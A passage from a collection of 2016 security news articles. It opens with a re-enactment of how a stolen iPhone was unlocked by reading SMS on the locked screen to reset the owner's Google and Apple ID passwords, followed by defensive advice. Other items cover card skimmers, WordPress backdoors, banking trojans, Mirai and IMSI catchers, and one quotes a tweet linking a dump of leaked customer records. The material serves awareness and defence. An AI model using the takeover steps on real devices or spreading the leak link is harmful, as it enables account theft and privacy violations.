So, we continued following the incident timeline. On the next step we used the previous discovered Google e-mail as the Apple ID account login and choose the option “forget password” again. After that, a message was shown informing that an e-mail was sent to the Google account with a link to reset the password. The rest of this paragraph is easy to figure out. We had success changing the password associated with that Apple ID.

3.6. Unlocking the “new” iPhone

Based on the facts that occurred in the real incident, it was time to remotely lock and erase the iPhone we were using to do the simulations.

I could bet these procedures helped the criminal getting access to the iPhone. After the erase process, the iPhone asks you to enter the Apple ID and password that was previously associated to that device. And, as we have that information, it was easy to access and configure the “new” iPhone from scratch.

4. Vulnerabilities and Recommendations

Well, of course we might have followed a different strategy compared to that of the criminals, but the result was the same – an iPhone unlocked without its credentials.

However, to achieve this result, there are some assumptions that we will consider as vulnerabilities that should be avoided:

a) Locked phone notifications

Allowing your smartphone to show notifications while locked is a great convenience. But at the same time, allowing them may represent a great risk to your privacy and security.

As shown in our experiment, this feature allowed us to read SMS and WhatsApp messages and, worst, answer it without unlocking the device.

We strongly recommend disabling “show notifications on your locked smartphone” (advice for users). Depending on your platform (Android or IOS) or App, there are different ways to configure this.

b) The ‘Sin’ Card

This episode remembered us how important it is to protect the SIM card. We all take care of locking our smartphones with strong passwords and fingerprint auth, strong encryption and so on (don`t we?), but we have to remember the importance of properly securing the SIM card.

As we could see on the experiments we did on this research, the SMS is an important peace nowadays in terms of transaction validation and authentication services. We used it to receive the Google unlock code, but it could be used to authenticate other kinds of transactions.

So, we recommend to set a password protection (PIN) to your SIM card. That way, you considerably reduce the risk of impersonation if you lose or you have your cell phone stolen.

Depending on your smartphone, there are different ways to configure it. Remember that, after you set your SIM card PIN, you have to insert it every time you reboot your smartphone (which is not very usable).


c) Two-factor authentication

Last but not least, please, enable two-factor authentication on your accounts right now! Two-factor authentication means that you have to provide a combination of at least two methods to prove your identity to the system you are dealing with. The possible factors you can pick from are these three: something that you know, like a password; something that you have, like a hard or soft token and something that you are, like your fingerprint.

Nowadays, almost all of the Internet services offers you the option to configure two-factor authentication – usually a password and token. There is an option for the second factor to be sending you an SMS, but we know that it may be fragile. Preferably, choose to use an App, like Google Authenticator, to generate the token.

This strategy will strongly reduce the risks of unauthorized access to your account. If the victim of this incident was using two-factor authentication, it would be impossible to change their password by using the SMS strategy.

5. Final words

Given the short period of time between the theft and the accounts hacking process, we believe that this strategy is widely used to unlock lost and stolen devices.

Aside from the financial loss directly involved with having an iPhone lost/stolen, this case brings us an important reflection. Are we protecting our SIM cards and SMS messages as we should? The potential impact, like improper information access or disclosure in scenarios like the one from this article, could be even more devastating. It would be an overkill to compare an unlocked SIM card to an important password that you carry every day, in clear text, attached to your smartphone?

Magento card-swiping malware hides stolen card data in legitimate images
19.10.2016 securityaffairs Virus

Security experts have spotted an interesting exfiltration technique adopted by crooks to exfiltrate card data from Magento platforms.
Security experts from Sucuri and RiskIQ have spotted an interesting exfiltration technique adopted by crooks to exfiltrate payment data from compromised e-commerce websites powered by the Magento platform.

Cybercriminals have been using image files to store and exfiltrate payment card data stolen from the target website. This last wave of attacks targeted over 100 online shops running on Magento, Powerfront CMS and OpenCart e-commerce platforms

Typically attackers use card-swiping malware that steals credit card data from the Magento shot and exfiltrates it via email or storing information in a file that is later accessed by hackers.

Experts noticed an interesting attack on Magento shops in which cybercriminals have used a malicious PHP file that dumps stolen data into an image file.

Similar exfiltration techniques are common, anyway, the attackers usually don’t use files containing real images send out the information.

“This is not out of the ordinary. It is actually characteristic of a lot of the credit card swipers we have seen lately.” reads a blog post published by Sucuri.

“Attackers use image files as an obfuscation technique to hide stolen details from the website owner. The image file usually doesn’t contain a real image, however, no one really suspects an image file to contain malware. This gives the attacker a secret place to store data. If the attacker had chosen to store the stolen credit card details in a simple text file then it might be easier for someone to discover it and take steps to remove the hack.”

In this specific case, the imaged used to store the payment card data are real and are related to the products offered for sale on the compromised website. This technique allows attackers to remain under the radar and avoid raising any suspicion.

The stolen data is appended at the end of the image file in clear text, and the file is publicly accessible. According to Sucuri, the majority of stolen card data came from the United States, but the files include also data related to victims from Japan, Turkey, Saudi Arabia and Canada.

Magento image-stole-card-data-vim-console

“To obtain the stolen numbers the attacker would not even have to maintain access to the site. The image was publicly accessible. All the attacker would need to do is download the image from the website just like any other and view its source code.” continues the post.

Sucuri invites owners of websites powered by Magento to keep their CMS up to date and apply all the latest patches.

It also invites administrators of the websites to use a complex password.

VeraCrypt Audit Reveals Critical Security Flaws — Update Now
18.10.2016 thehackernews Vulnerebility
After TrueCrypt mysteriously discontinued its service, VeraCrypt became the most popular open source disk encryption software used by activists, journalists, as well as privacy conscious people.
First of all, there is no such thing as a perfect, bug-free software.
Even the most rigorously tested software, like the ones that operate SCADA Systems, medical devices, and aviation software, have flaws.
Vulnerabilities are an unfortunate reality for every software product, but there is always space for improvements.
Due to the enormous popularity of VeraCrypt, security researchers from the OSTIF (The Open Source Technology Improvement Fund) agreed to audit VeraCrypt independently and hired researchers from QuarksLab in August to lead the audit.
And it seems like VeraCrypt is not exactly flawless either.
Now after one month of the audit, researchers have discovered a number of security issues, including 8 critical, 3 medium, and 15 low-severity vulnerabilities in the popular encryption platform VeraCrypt.
Quarkslab senior security researcher Jean-Baptiste Bédrune and senior cryptographer Marion Videau analyzed the VeraCrypt version 1.18 and the DCS EFI Bootloader 1.18 (UEFI), mainly focusing on new features introduced since last year's TrueCrypt security audit.
VeraCrypt file encryption software has been derived from the TrueCrypt project, but with enhancements to further secure your data.
"VeraCrypt is a project hard to maintain," researchers said. "Deep knowledge of several operating systems, the Windows kernel, the system boot chain and good concepts in cryptography are required. The improvements made by IDRIX demonstrate the possession of these skills."
The researchers have detailed all the vulnerabilities in a 42-page audit report [PDF], which includes:
Critical bugs in the implementation of GOST 28147-89, a symmetric block cipher with a 64-bit block size, which they say must be removed completely due to unsafe implementation.
All compression libraries are considered outdated or "poorly-written," and must be replaced with modern and more secure zip libraries.
If the system is encrypted, the boot password in UEFI mode or its length can be determined.
The majority of flaws have been fixed in the latest VeraCrypt version 1.19 release, but a few of them including AES implementation have not yet been patched due to substantial modifications of the code or/and the architecture of the project.
So, according to the OSTIF, "VeraCrypt is much safer after this audit, and the fixes applied to the software mean that the world is safer when using this software."
You are recommended to download the latest VeraCrypt version 1.19.

British banks downplay security breaches
18.10.2016 securityaffairs Crime

Banks and financial institution in the UK are reportedly failing to disclose the full extent security breaches they are experiencing.
UK banks are reportedly failing to disclose the full extent of the number and nature of security incidents they are experiencing due to a fear of financial punishment and negative publicity.

Banking execs and security experts have stated that the banks are using grey areas in reporting structures in order to downplay the extent of which they are being targeted on a daily basis.

According the UK’s financial regulation authority, the FSA, where banks have an obligation to report any incident to, have claimed last month that last year there were only a total of 75 incidents.

This in itself is a marked increase from the declared 27 in 2015 and 5 in 2014. Any active members of the security industry will recognize these figures as incredibly low and unrealistic given the nature of today’s security and malware environment.

“Banks are dramatically under-reporting attacks, they do what’s legally required but out of embarrassment or fear of punishment they aren’t giving the whole picture,” was the claim from an anonymous source within the cyber security space of the banking sector.

security breaches

Mark James, a security specialist from ESET stated “Reporting every one of those attempts would indeed clog systems with lots of unnecessary information and I’m sure there will be a lot that never makes the light of day,”

He went on to add “However, the problem of course is perceived security, as more and more breaches happen and more malware is being used to target financial systems, then the damage caused when things go wrong can be so great decisions will be made to keep it quiet. However, with the public becoming more aware of the damage caused by lapsed security, this may influence the decision on who is to look after their savings and daily finances in the future.”

These figures could be set to change as the reporting parameters are expected to be tightened with the imminent EU General Data Protection Regulation (GDPR) which will introduce a mandatory reporting structure that all UK banks and lenders will be compelled to comply with.

This will require mandatory notification within 72 hours of security breaches and will instate the possibility of fines of up to £18M GBP or 4% of annual turnover for what’s deemed as a serious non-compliance and infractions.

Crooks exploit a zero-day in WordPress eCommerce Plugin to upload a backdoor
18.10.2016 securityaffairs Vulnerebility

Experts from the White Fir Design discovered cybe rcriminals exploited a zero-day flaw in an e-commerce plugin for WordPress to upload a backdoor.
According to the experts from the firm White Fir Design, crooks exploited a zero-day flaw in an e-commerce plugin for WordPress to upload backdoors to affected websites.

The plugin is WP Marketplace, a plugin for the popular WordPress CMS that implements e-commerce features. The plugin is not so popular, it is installed on less than 500 websites worldwide and the bad news it that it is no longer maintained, so the security holes will never be patched. The WP Marketplace was not updated in the last 8 months and last week it was removed from the official WordPress Plugin Directory.

The experts noticed requests for a certain file associated with the flawed WP Marketplace, they discovered that was a scan for websites running the plugin in the attempt to exploit the flaw.

The issue is an arbitrary file upload vulnerability as explained by the experts.

“Within the last day we had a request for the file /wp-content/plugins/wpmarketplace/css/extends_page.css, which is part of the plugin WP Marketplace. Requesting a file from a plugin that isn’t installed on a website is usually indication that a hacker is probing for usage of it before exploiting something. We have also seen some requests for the file in the third-party data we monitor as well.” read the analysis published by White Fir Design. “Seeing as arbitrary file upload vulnerabilities are so likely to be exploited, one of the first things we look for when trying to determine what hackers might be exploiting in a plugin is that type of issue. In this case, we quickly found one. In the file /modules/additional-preview-images.php the function wpmp_upload_previews() is made accessible when loading admin pages (as the function is_admin() tells you that, not if the user is Administrator)”


The researchers from the security firm Sucuri also observed attack attempts in the wild, they confirmed that cyber criminals have been exploiting arbitrary file upload vulnerability to upload a backdoor on the affected websites.

“We checked our Website Firewall logs and confirmed that the WP Marketplace vulnerability is now a part of a hacker’s toolkit. When they detect sites with the installed plugin, they try to exploit the vulnerability and upload backdoors.” states a blog post published by Sucuri.

“Of course, it is not as valuable for hackers as vulnerabilities in popular plugins installed on every other site, but if your toolkit comprises hundreds of smaller vulnerabilities, the success rate will be comparable,” said Sucuri’s Denis Sinegubko. “That’s why plugin developers shouldn’t neglect best security practices even when developing small plugins.”

The experts from White Fir Design highlighted that the same development team also distributed other plugins, including the WordPress Download Manager that is affected by the file upload flaw at least since June and it is still unpatched.

Shadow Brokers launched a crowdfunding campaign to raise 10,000 bitcoins

18.10.2016 securityaffairs APT

The group calling itself The Shadow Brokers who hacked the NSA-linked Equation Group announced the launch of a crowdfunding campaign for the stolen arsenal.
This summer the hacker group Shadow Brokers hacked the NSA-linked group known as the Equation Group and leaked 300 Mb of hacking tools, exploits, and implants.

The Shadow Brokers launched an all-pay auction for the full archive containing the entire arsenal of the Equation Group. Early October, The Shadow Brokers have complained that no one has offered money for their precious archive.

Shadow Brokers hacked Equation Group

The auction received offers for less than two bitcoins, so the hacker group decided to launch a crowdfunding.

The Shadow Brokers team has collected bids for a total of 1.76 bitcoins (roughly $1,100), but the dreaded team was expecting to earn as far as $1 million.

But probably we misunderstood the intent of the hackers because the hackers’ crowdfunding campaign aims to raise 10,000 bitcoins (roughly $6.4 million).

“TheShadowBrokers is being bored with auction so no more auction. Auction off. Auction finish. Auction done. No winners. So who is wanting password? TheShadowBrokers is publicly posting the password when receive 10,000 btc (ten thousand bitcoins). Same bitcoin address, same file, password is crowdfunding. Sharing risk. Sharing reward. Everyone winning.” reads the announcement published by the group.

But unfortunately, the crowdfunding campaign is not obtaining the expected results.

Who is the behind the Shadow Brokers crew?

Some experts speculate it is a group of Russian state-sponsored hackers, government, other believe that it is a group of hackers that has simply found the arsenal that was mistakenly left unattended by an employee or a contractor on a remote server.

The ShadowBrokers hackers then have discovered the server and raided it.

“NSA officials have told investigators that an employee or contractor made the mistake about three years ago during an operation that used the tools, the people said.” reported the Reuters.

“That person acknowledged the error shortly afterward, they said. But the NSA did not inform the companies of the danger when it first discovered the exposure of the tools, the sources said. Since the public release of the tools, the companies involved have issued patches in the systems to protect them.”

UK Police purchased IMSI-catcher technology for mobile surveillance
17.10.2016 securityaffairs Mobil

According to documents analyzed by The Bristol Cable media Agency, the UK authorities have purchased IMSI-catcher equipment.
Privacy advocates and rights groups are in revolt against the UK law enforcement that has purchased mobile phone snooping technology.

The rights groups are protesting against the adoption of the IMSI-catcher technology that could be used for dragnet surveillance.

The IMSI-catcher is a surveillance solution used for intercepting mobile phone traffic, calls, tracking movements of mobile phone users block phones from operating.

An IMSI catcher runs a Man in the Middle (MITM) attack acting as a bogus mobile cell tower that sits between the target mobile phone and the service provider’s real towers.

The UK police has purchased police this mobile phone snooping technology to track suspects’ devices and intercept their communications as part of their investigations.

The problem is that devices such as the IMSI-catcher monitor indiscriminately monitor mobile devices in an area of up to 8km, representing a serious threat to users’ privacy.

Rights groups are demanding for transparency from the police about the use of surveillance technology.

According to the Bristol Cable the UK police is using the Stingray equipment for its operations. The law enforcement has reportedly purchased “covert communications data capture” equipment (CCDC) from a UK firm, the Cellxion.


“IMSI Covert Communications” that was earmarked £144,000. In the same budget the “CCDC” item was allocated at the same price, £144,000.

“South Yorkshire police confirmed that ‘CCDC’ and ‘IMSI Covert Communications’ are the same budget item.”

The invoices obtained by the Cable, the local UK police paid Cellxion £169,575.00 for CCDC equipment, as well as other “communications and computing equipment.”

“Suspicions have been raised in the past that IMSI-catchers are in use in the UK. These suspicions, until now, have focused on the Metropolitan Police’s purchase and use of the technology. Now, the Cable can exclusively reveal that at least five other forces appear to have contracted for IMSI-catchers, including Avon and Somerset (A&S) Constabulary.” revealed The Bristol Cable “This revelation comes from decrypting for the first time the acronym – CCDC, standing for covert communications data capture – in use by police forces across the country to obscure their apparent purchase of IMSI-catchers, and identifying police contracts with Cellxion, a firm that manufactures them.”

Privacy International advocacy officer Matthew Rice condemned the lack of transparency in the use of IMSI catcher technology. Now that we now know the acronyms used by the police, it is important to reveal the real use of surveillance technology.

“While journalists and activists [have] spent time requesting information about IMSI-catchers… the real question we should have been asking our police forces was about the term CCDC (covert communications data capture),” he says.

“The longer the policy of denial of existence of these capabilities go on, the worse it is for police, citizens, and civil liberties in the United Kingdom,” he says.

It is still unclear whether the UK police and intelligence agencies have used IMSI-catchers and in which kind of operations.

The new TrickBot Banking Trojan seems to have been developed by Dyre authors
17.10.2016 securityaffairs Virus

Researchers at Fidelis Cybersecurity believe that someone behind the development of the Dyre banking Trojan is now behind the new Trickbot malware.
This morning I published a post on the data provided by Group-IB on crime trends, the report published by the security firm reveals a continuous evolution of cybercriminal ecosystem. The story that I’m going to tell you confirms this rapid evolution, at least one of the author behind the infamous Dyre banking Trojan (aka Dyreza) is apparently working on a new banking Trojan dubbed ‘TrickBot.’

The Dyreza botnet infected hundreds of thousands of machines worldwide, according to the Heimdal Security, in November 2015 more than 80.000 machines were already infected with Dyre Trojan across the world. Security experts estimated that users of more than 1000 financial institutions have fallen victim of the threat.

In November 2015, Dyre activity ceased, the Reuters agency also reported authorities raided offices of a Russian film distribution and production company as part of an operation against the Dyre gang.

The operation of the Russian police successfully beheaded the organization behind the Dyre Trojan,

“We have seen a disruption over the last few months that is definitely consistent with successful law enforcement action,” explained security expert John Miller from iSight Partners.

Now security experts at Fidelis Cybersecurity believe that someone behind the development of the Dyre banking Trojan has escaped the arrest and he is now participating in a new project.


Researchers at Fidelis Cybersecurity that are monitoring the evolution of the TrickBot malware speculate it has a strong connection to Dyre banking trojan.

The security firm first spotted the TrickBot malware in September while it was used by crooks to target the customers of Australian banks (ANZ, Westpac, St. George and NAB).

The first TrickBot samples analyzed by the experts were implementing a single data stealer module, but a few weeks later, the researchers discovered a new sample including webinjects that appear to be in the testing phase.

“In September 2016, Fidelis Cybersecurity was alerted to a new malware bot calling itself TrickBot that we believe has a strong connection to the Dyre banking trojan. From first glance at the loader, called TrickLoader, there are some striking similarities between it and the loader that Dyre commonly used. It isn’t until you decode out the bot, however, that the similarities become staggering.” reads the analysis published by Fidelis Cybersecurity.

“This would suggest, but is far from conclusive, that some individuals related to the development of Dyre have found their way into resuming criminal operations.”

TrickBot and Dyre have many similarities, the code of the new banking trojan seems to have been rewritten with a different coding style, but maintaining many functionalities.

TrickBot includes more C++ code, compared to Dyre, which is mostly written using the programming language C. Another difference is that the new trojan leverages on the Microsoft CryptoAPI instead of built-in functions for AES and SHA-256 hashing.

Below the main differences highlighted in the analysis:

Instead of running commands directly the bot interfaces with TaskScheduler through COM for persistence
Instead of running an onboard SHA256 hashing routine or AES routine the bot utilizes Microsoft CryptoAPI
There is considerably more code in the C++ programming language versus the original Dyre that used C for the most part.
“Based on these observations, it is our assessment with strong confidence that there is a clear link between Dyre and TrickBot but that there is considerable new development that has been invested into TrickBot. With moderate confidence, we assess that one of more of the original developers of Dyre is involved with TrickBot.” states the post.

The analysis of the custom crypter revealed that the malware loader (TrickLoader) is the same used by other malware such as Vawtrak, Pushdo and Cutwail malware. This last malware is associated with the spambot used by threat actor behind the Dyre threat, this element suggests that cybercriminals are trying to rebuild the Cutwail botnet.

For further information give a look at the post that includes a full list of IOCs and hashes.

‘Adult’ video for Facebook users
17.10.2016 Kaspersky Social
In April of this year, we registered some mass attacks on Facebook users in Russia. As a result, many Russian-speaking users of the social network fell victim to fraudsters. Half a year later the fraudsters have used the same tactics to attack Facebook users in Europe.

The attackers use a compromised Facebook account to post a link to an adult video that is supposedly on the popular YouTube service. In order to attract potential victims, “likes” are added from the account holder’s list of friends. The fraudsters rely on the user or their friends being curious and those who would like to watch an “18+” video.


Clicking on the link opens a page made to look like YouTube.


However, a quick look at the address bar is enough to see that the page has nothing to do with YouTube. During the latest attack the fraudsters distributed a “video” located on the xic.graphics domain. The domain is not currently available, but we discovered more than 140 domains with the same registration data that can be used for similar purposes.
After trying to start the video, a pop-up banner appears prompting the user to install a browser extension. In this particular example, it was called ‘Profesjonalny Asystent’ (Professional assistant), but we also came across other names.


The “View details” message explains that if the extension is not installed, the video cannot be viewed.

The attackers are banking on an intrigued victim not being interested in the details and just installing the extension. As a result, the extension gains rights to read all the data in the browser, which the fraudsters can later use to get all the passwords, logins, credit card details and other confidential user information that is entered. The extension can also continue spreading links to itself on Facebook, but now in your name and among your friends.

We strongly recommend not clicking such links and not installing suspicious browser extensions. It’s also worth checking if any suspicious extensions have already been installed. If any are discovered, they should be immediately removed via the browser settings, and the passwords for sites that are visited most often, especially online banking, should be changed.

The Mirai botnet is targeting also Sierra Wireless cellular data gear products
16.10.2016 securityaffairs BotNet

Sierra Wireless is warning its customers to change factory credentials of its AireLink gateway communications products due to Mirai attacks.
Sierra Wireless is warning its customers to change factory credentials of its AireLink gateway communications product.

The company is aware of a significant number of infections caused by the Mirai malware, a threat specifically designed to compromise poorly configured IoT devices.

The malware was first spotted in August by MalwareMustDie have analyzed samples of this new ELF trojan backdoor. The name of the malware is the same of the binary,”mirai.*,” and according to the experts, several attacks have been detected in the wild.

The Mirai malware scans the web searching for connected devices such as DVRs and IP-enabled cameras that use default or hard-coded credentials.


Back to the to the Sierra Wireless alert, the company is warning its customers that of Mirai attacks against the AirLink Cellular Gateway devices (LS300, GX400, GX/ES440, GX/ES450 and RV50).

“Sierra Wireless has confirmed reports of the ‘Mirai’ malware infecting AirLink gateways that are using the default ACEmanager password and are reachable from the public internet. The malware is able to gain access to the gateway by logging into ACEmanager with the default password and using the firmware update function to download and run a copy of itself,” Sierra Wireless wrote in a security bulletin . “Devices attached to the gateway’s local area network may also be vulnerable to infection by the Mirai malware.”

The Mirai botnet was involved in a number of severe attacks, according to the experts it powered DDoS attacks against the website of the popular investigator Brian Krebs and the OVH hosting provider that reached 1Tbps.

Unfortunately, the number of malware specifically designed to infect IoT systems continue to increase. This week, Security Affairs published in exclusive the discovery of a new threat, dubbed NyaDrop, made by experts at MalwareMustDie.

“There is evidence that ‘Internet of Things’-type devices have been infected with the Linux malware Mirai, which attackers used in the recent DDoS attacks against the web site Krebs on Security,” reads a security bulletin published by the US ICS-CERT.

US is thinking of a possible cyber strike against the Kremlin
16.10.2016 securityaffairs Cyber

The US Government is thinking of a possible cyber strike against the Kremlin in response to the alleged interference with the 2016 presidential election.
A few days ago the US Government has formally accused the Russian Government of trying to interfere in the 2016 Political Election.

Washington is officially accusing Russia trying to interfere the 2016 US presidential election, announcing it will adopt all necessary countermeasures to defeat the threat.

The Office of the Director of National Intelligence and the Department of Homeland Security have issued a joint security statement to accuse the Russian government of a series of intrusions into the networks of US organizations and state election boards involved in the Presidential Election.

“The U.S. Intelligence Community (USIC) is confident that the Russian Government directed the recent compromises of e-mails from US persons and institutions, including from US political organizations. The recent disclosures of alleged hacked e-mails on sites like DCLeaks.com and WikiLeaks and by the Guccifer 2.0 online persona are consistent with the methods and motivations of Russian-directed efforts. These thefts and disclosures are intended to interfere with the US election process” reads the statement.

“We will take action to protect our interests, including in cyberspace, and we will do so at a time and place of our choosing,” a senior administration official told AFP.

“The public should not assume that they will necessarily know what actions have been taken or what actions we will take.”

On Friday, the US Vice President Joe Biden during an interview with NBC explained that “message” would be sent to Russian President Vladimir Putin over the alleged hacking.

“Vice President Joe Biden told “Meet the Press” moderator Chuck Todd on Friday that “we’re sending a message” to Putin and that “it will be at the time of our choosing, and under the circumstances that will have the greatest impact.” reported the NBCnews.

“When asked if the American public will know a message was sent, the vice president replied, “Hope not.“”

According to NBC, the CIA was preparing a retaliatory cyber attack “designed to harass and ’embarrass’ the Kremlin leadership.”

“The Obama administration is contemplating an unprecedented cyber covert action against Russia in retaliation for alleged Russian interference in the American presidential election”

Yes, but what does it mean to think of a covert operation when diplomat shout revenge in the wild? Clearly, the US politic is using the cyber threat as deterrence for further initiatives of the Kremlin.

These statements are useless, both governments already conducting covert operations against their adversary, and history is full of examples.

According to the NBC News, the sources did not elaborate on the tactic that the CIA was considering but said the US intelligence is already selecting targets and making other preparations for a cyber operation.

Former intelligence officers explained that the CIA is likely working at a PSYOPs by gathering reams of documents that could expose “unsavory tactics” by President Vladimir Putin.


On the other side, the Russian Government denies any interference with the 2106 Presidential election, the Kremlin spokesman Dmitry Peskov replied to the Biden’s statements saying that his Government would take precautions to protect itself from the “unpredictability and aggressiveness of the United States.”

“The threats directed against Moscow and our state’s leadership are unprecedented because they are voiced at the level of the US vice president,” reported the Russian RIA Novosti news agency.

“To the backdrop of this aggressive, unpredictable line, we must take measures to protect (our) interests, to hedge risks.”

Intelligence analysts believe that the two governments will intensify the operations in the cyberspace, the Russian diplomat Yuri Ushakov vowed Moscow would respond to any cyber attacks powered by Washington.

Ushakov declared that the Kremlin will consider any attack from the cyberspace as a “borderline insolence.”

Why Russian hackers are interfering with 2016 political elections?

According to some experts, the Kremlin aims to favor Donald Trump who has praised by Vladimir Putin. The crisis among Russia and US was exacerbated due to Crimea invasion and Russian support to the Syrian government.

Symantec observed a surge of spam emails using malicious WSF files
16.10.2016 securityaffairs Spam

Symantec observed a significant increase in the number of email-based attacks using malicious Windows Script File (WSF) attachments.
Experts from Symantec are observing a significant increase in the number of email-based attacks leveraging malicious Windows Script File (WSF) attachments. Over the past three months, threat actors have adopted the tactic in the wild, mostly criminal organizations behind ransomware campaign.

“In the past two weeks, Symantec has blocked a number of major campaigns distributing Locky (Ransom.Locky) which involved malicious WSF files.” reads a blog post from Symantec.

A Windows Script File (WSF) is a file type that allows mixing the scripting languages, such as Pyton, JScript and VBScript within a single file.

WSF files are opened and executed by the Windows Script Host (WSH), they can be launched like a common executable file.

Symantec highlighted that .wsf files are not automatically blocked by some email clients. Threat actors used malicious Windows Script File files in a number of recent major spam campaigns spreading ransomware link Locky.

Symantec blocked more than 1.3 million emails bearing the subject line “Travel Itinerary” between October 3 and 4. In this campaign, hackers leveraged on malicious emails purported to come from a major airline that came with Windows Script File file within a .zip archive.

Symantec added that on October 5, the same threat actor launched a new massive spam campaign with the subject line “complaint letter.”

“Symantec blocked more than 918,000 of these emails. The email purported to come from someone representing a client who was making a complaint “regarding the data file you provided.” Once again, the emails came with an attachment that consisted of a WSF file within a .zip archive. If the WSF file was allowed to run, Locky was installed on the victim’s computer.” added Symantec.

Experts from Symantec believe that the used of .WSF file is a broader trend, the number of emails being blocked containing this kind of malicious attachments is increased in the last months as reported in the following graph.

“From just over 22,000 in June, the figure shot up to more than 2 million in July. September was a record month, with more than 2.2 million emails blocked.” reads the post from Symantec.


Threat actors in the wild often adopt new tactics frequently changing the format of the malicious attachments for their campaigns to avoid detection.

Crack for Charity — GCHQ launches 'Puzzle Book' Challenge for Cryptographers
16.10.2016 thehackernews BigBrothers

The UK's Signals Intelligence and Cyber Security agency GCHQ has launched its first ever puzzle book, challenging researchers and cryptographers to crack codes for charity.
Dubbed "The GCHQ Puzzle Book," the book features more than 140 pages of codes, puzzles, and challenges created by expert code breakers at the British intelligence agency.
Ranging from easy to complex, the GCHQ challenges include ciphers and tests of numeracy and literacy, substitution codes, along with picture and music challenges.
Writing in the GCHQ Puzzle Book's introduction, here's what GCHQ Director, Robert Hannigan says:
"For nearly one hundred years, the men and women of GCHQ, both civilian and military, have been solving problems. They have done so in pursuit of our mission to keep the United Kingdom safe. GCHQ has a proud history of valuing and supporting individuals who think differently; without them, we would be of little value to the country. Not all are geniuses or brilliant mathematicians or famous names, but each is valued for his or her contribution to our mission."
The idea for the GCHQ Puzzle Book came after the success of last year's cryptographic puzzle challenge that was dubbed the 'hardest puzzle in the world' and featured in Hannigan's Christmas card.
Nearly 600,000 people from across the globe take part in the challenge; only 30,000 had made it reach the final stage, but three people came very close, who were considered winners by the GCHQ.
However, the solution to the Christmas puzzle, including explanations from the puzzle-setters, was publicly made available early this year for anyone to have a look.
The GCHQ Puzzle Book, published by Penguin Random House, will be on sale from 20th October at High Street book retailers and online.
All GCHQ earnings from the book will be donated to Heads Together — the "campaign spearheaded by the Duke and Duchess of Cambridge and Prince Harry, to tackle stigma, raise awareness and provide vital help for people with mental health challenges."

FBI is Investigating Theft of $1.3 Million in Bitcoin from a Massachusetts Man
16.10.2016 thehackernews Crime
Over two months ago, the world's third largest Bitcoin Exchange Bitfinex lost around $72 Million worth of Bitcoins in a major hack.
Shortly after the company encountered a $72,000,000 Bitcoin theft, an unnamed Bitfinex user from Cambridge, Massachusetts, filed a police report in September, alleging that $1.3 Million of funds were stolen from his account.
Since then the Cambridge police have handed the case over to the FBI, which is working with the Bitcoin exchange as well as European authorities to recover funds stolen from the Bitfinex user, Coindesk reports.
The individual claimed that he held $3.4 Million in Bitcoin in his personal wallet hosted by the Bitfinex Bitcoin exchange. But following the August’s Bitfinex breach, he was left with $2.1 Million in his account.
Bitfinex then notified the individual of his initial loss of approximately $1.3 Million in Bitcoin, but after the company issued IOU tokens as an emergency measure to keep the exchange operating, the loss incurred was reduced to just $720,000.
The IOUs or BFX tokens are a form of compensation provided to the victims to reduce their losses by a significant factor.
Although specific details remain still unclear, the Bitfinex user confirmed lose of funds beyond Bitfinex IOU tokens issued to all the victims of the breach.
The usability of the token is still unclear. Neither the explanation of tokens provided by Bitfinex is much clear, nor the legal status of the tokens is known.
"The BFX tokens will remain outstanding until repaid in full by Bitfinex or exchanged for shares of iFinex Inc," explains the company. "The specific conditions associated with the exchange of these tokens will be explained in a later announcement."
For the incident report filed by the Bitfinex user, you can head on to this link. No further details about the case are available at this moment.
Shortly after the breach of around $72 Million worth of its customers' Bitcoins, Hong Kong-based Bitcoin exchange announced a reward of $3.5 Million to anyone who can provide information that leads to the recovery of the stolen Bitcoins.
The incident was so big that the price of Bitcoin was dropped almost 20%, from $602.78 to $541 per Bitcoin, within a day after the announcement.

58M records dumped from an unsecured DB of the Modern Business Systems
16.10.2016 securityaffairs Crime

Hackers have leaked online over 58 million customer records from data storage firm Modern Business Systems, but the situation could be more severe.
58 million customer records have been leaked online by hackers, the huge trove of data seems to come from a data storage firm.

The records include personal information such as names, dates of birth, email and postal addresses, job titles, phone numbers, vehicle data, and IP addresses.

The archive appears to have been exfiltrated from an unsecured database of the Modern Business Systems (MBS), which is a company that provides data storage and database hosting services.

I received a portion of the archive a few days ago by the hacker which uses the Twitter account @0x2Taylor. When the hacker sent me the archive we both had no idea about its source.

The hacker released at least 58 million records stolen from Modern Business Systems’s systems.

#BBK ~ $Taylor @0x2Taylor
Database Loaded : 52 Million Subscriber DB https://mega.nz/#!t9EyUapD!uOfzzH-SJOlYycdYTq8AKzdcBoR8R02kXvZ3naaL3Xs … Email,DOB,Name,Address,IP,Phone Number. #0x2Gang #DataDump
02:01 - 8 Ott 2016
8 8 Retweet 16 16 Mi piace
Experts who analyzed the archive determined that it belongs to MBS which was exposing an unsecured MongoDB database on the Internet.

“While the data itself is easy enough to read, identifying the owner of the database has been more challenging. Nothing within the dumped dataset itself pointed to who might be responsible for the information. Through additional investigation and subsequent exchanges with 0x2Taylor, researchers were able to obtain the IP address of the database.” reads a blog post published by Risk Based Security. “With that information, researchers were able to confirm it was an open MongoDB installation and identify the owner as Modern Business Solutions. Working with Databreaches.net, Modern Business Solutions was contacted and made aware of the issue. Although neither RBS or Databreaches.net have yet received a reply from Modern Business Solutions, the database has since been secured and is no longer accessible.”

Modern Business Systems

The database includes data from companies that are customers of the MBS, if you have had a business relationship with it you can check for the presence of your data through the breach notification service “Have I Been Pwned?” .

Unfortunately, the situation is probably more severe because giving a close look at the above image experts speculate the hacker had access to a database containing over 258 million rows of customer records.

This breach is the last in order of time that is related to misconfigured MongoDB databases. In the past security experts

In December the popular expert and Shodan creator John Matherly found over 650 terabytes of MongoDB data exposed on the Internet by vulnerable databases.

Android Acecard banking trojan asks users for selfie with an ID card
16.10.2016 securityaffairs Android

Experts discovered a new variant of the Android Acecard banking trojan that asks victims to take a selfie while they are holding an ID card.
The inventiveness of the criminals is a never ending pit. Recently, a number of organizations announced a new authentication method based on the selfies. For example, HSBC customers can open new bank accounts using a selfie, such as the Bank of Scotland and many other financial organizations and Mastercard.

Crooks have already started taking advantage of this new method of biometric authentication, experts at McAfee discovered a new Android banking Trojan, dubbed Acecard, that pretends to be an adult video app or a codec/plug-in necessary to see a specific video.

“Recently the McAfee Labs Mobile Research Team found a new variant of the well-known Android banking Trojan Acecard (aka Torec, due to the use of Tor to communicate with the control server) that goes far beyond just asking for financial information.” reads a blog post published by McAfee. “In addition to requesting credit card information and second-factor authentication, the malicious application asks for a selfie with your identity document—very useful for a cybercriminal to confirm a victim’s identity and access not only to banking accounts, but probably also even social networks.”

